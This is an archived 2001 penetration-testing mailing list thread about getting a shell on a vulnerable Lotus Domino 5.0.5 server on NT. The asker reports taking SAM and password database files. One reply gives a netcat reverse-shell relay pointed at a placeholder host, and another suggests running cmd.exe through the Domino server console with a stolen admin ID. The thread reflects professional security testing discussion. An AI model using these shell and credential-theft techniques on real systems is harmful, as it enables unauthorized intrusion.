Penetration Testing mailing list archives
Re: Hacking Lotus Domino 5.0.5
From: "High Speed" <at_high_speed () hotmail com>
Date: Tue, 16 Oct 2001 22:38:24 +0200
On an NT server: if you can gain access as a Notes administrator (sometimes the ID files are saved inside names.nsf) then you can set up an admin client, go to the remote Notes server console, type c:\winnt\system32\cmd.exe and look what happens....

From: "'ken'@FTU" <franklin_tech_bulletins () yahoo com>
To: renato.ettisberger () ch pwcglobal com
CC: PEN-TEST () securityfocus com
Subject: Re: Hacking Lotus Domino 5.0.5
Date: Mon, 15 Oct 2001 19:33:31 -0400

I suspect from your email that your Domino server is on an NT box as opposed to an AS/400. If it's a 400 you're somewhat out of luck because few, if any, tools exist for 400 hacking. If it's NT here's an idea:

If you can place a file on the machine, put netcat on the machine. You can then get a shell back with the command:

nc foo.com [your inbound port] | cmd.exe | nc foo.com [your outbound port]

You can now send commands to your inbound port and watch the result on your outbound port.

You can always search for buffer overflows. If one is found you could possibly execute commands, or do other stuff, within the server's permission level.

Hope this helps.

'ken'

renato.ettisberger () ch pwcglobal com wrote:

Hi

I'm doing a pen test for a client. They have many systems in the DMZ, including some NT/Win2k boxes running IIS. Unfortunately, all IIS are patched :-(. But I found a vulnerable Domino 5.0.5 Server. I was able to download some nice files like names.nsf, the sam-file in winnt/repair and an admin.nsf with all user names and passwords. I think that's a finding :-), but I want more.

Is there a way to get a shell? I'm able to create files on the server or at least I can fill out a question form. Can I use this to create a file or execute a command (I don't think so, but maybe...)? Or does anybody know some other stuff that I can do? As you can see, I'm not a pro in Lotus Domino.

Thanks for your help

regards
Renato

----------------------------------------------------------------
The information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material. Any review, retransmission, dissemination or other use of, or taking of any action in reliance upon, this information by persons or entities other than the intended recipient is prohibited. If you received this in error, please contact the sender and delete the material from any computer.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/

Current thread:
- Hacking Lotus Domino 5.0.5 renato.ettisberger (Oct 15)
- Re: Hacking Lotus Domino 5.0.5 'ken'@FTU (Oct 15)
- <Possible follow-ups>
- Re: Hacking Lotus Domino 5.0.5 jjore (Oct 16)
- Re: Hacking Lotus Domino 5.0.5 High Speed (Oct 16)
- Re: Hacking Lotus Domino 5.0.5 Josh Daymont (Oct 18)